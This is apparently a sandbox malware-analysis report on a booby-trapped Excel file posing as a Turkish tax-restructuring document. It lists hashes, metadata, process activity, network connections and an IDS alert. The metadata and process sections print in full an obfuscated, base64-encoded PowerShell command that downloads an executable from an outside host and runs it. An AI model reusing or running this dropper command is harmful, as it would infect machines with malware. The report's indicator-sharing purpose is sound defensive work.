File name: | GIB 12. YENI VERGI YAPILANDIRMA.xls |
Full analysis: | https://app.any.run/tasks/a55d858d-b9e4-46f3-a6e5-1635575d2bf6 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 15:06:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: USER, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Dec 17 07:11:47 2018, Last Saved Time/Date: Wed Dec 19 20:47:31 2018, Security: 0 |
MD5: | 8200197AB2227C7A0F2D825BABB697EB |
SHA1: | EAC226F6673C083F5BC62D39B1C99EC011262FD5 |
SHA256: | 7EC4DA947D57EBD3ADABBB7B2FE94DF5EA8448410081E0262A9253287F189A44 |
SSDEEP: | 768:S69lYLFSYiRUBxm2UDvZSvfjCwA3Mem1L4VXlPNG9MRy/3atNfNfhSigTf236xyv:r3YLAYiRUBxm2UDvZSvfjCwA8em1L4VX |
.xls | | | Microsoft Excel sheet (78.9) |
---|
Author: | USER |
---|---|
LastModifiedBy: | USER |
Software: | Microsoft Excel |
CreateDate: | 2018:12:17 07:11:47 |
ModifyDate: | 2018:12:19 20:47:31 |
Security: | None |
CodePage: | Unicode (UTF-8) |
Company: | poWERSHELl.EXe -EX BYpASs -nOp -w HIDden -ec CQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA= |
AppVersion: | 14 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | Sayfa1 |
HeadingPairs: |
|
CompObjUserTypeLen: | 37 |
CompObjUserType: | Microsoft Excel 2003 ?alisma Sayfasi |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2384 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
1156 | poWERSHELl.EXe -EX BYpASs -nOp -w HIDden -ec CQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA= | C:\Windows\System32\WindowsPowerShell\v1.0\poWERSHELl.EXe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8851.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1156 | poWERSHELl.EXe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\76Q4ZAHRNLOW5U5YLPZG.temp | — | |
MD5:— | SHA256:— | |||
2384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\VBE\RefEdit.exd | tlb | |
MD5:36DA875E8FEB6EF58668B4C33A1703BD | SHA256:3F35267980DDC72329423FB2BF8E7227EA733F8A773C52507A6470344972B28D | |||
1156 | poWERSHELl.EXe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
1156 | poWERSHELl.EXe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf92b1.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2384 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\GIB 12. YENI VERGI YAPILANDIRMA.xls.LNK | lnk | |
MD5:D234DD9CBA40C215283B5C97C2D52420 | SHA256:D2597629D88050E16507AFA7E4BABA653984E69A903E0014FFA50B37836C8789 | |||
2384 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:BAC63DCBFC64AF81BA051F4F2C2F8E09 | SHA256:815420AE88FEDEA409DB13E1E7A79A26970BF0D68BA257F331EBA0B97D7F0A83 | |||
2384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:BB53F60AE247473CCC5395DD757F5B6D | SHA256:A5204EDF54B58057CCDA2E17A229366383B5BC04CA40200566A8B8692D1348C8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1156 | poWERSHELl.EXe | GET | 301 | 37.61.239.108:80 | http://www.timucinmuratalan.com/Rem4.exe | GB | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1156 | poWERSHELl.EXe | 37.61.239.108:80 | www.timucinmuratalan.com | Namecheap, Inc. | GB | suspicious |
Domain | IP | Reputation |
---|---|---|
www.timucinmuratalan.com |
| suspicious |
timucinmuratalan.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1156 | poWERSHELl.EXe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |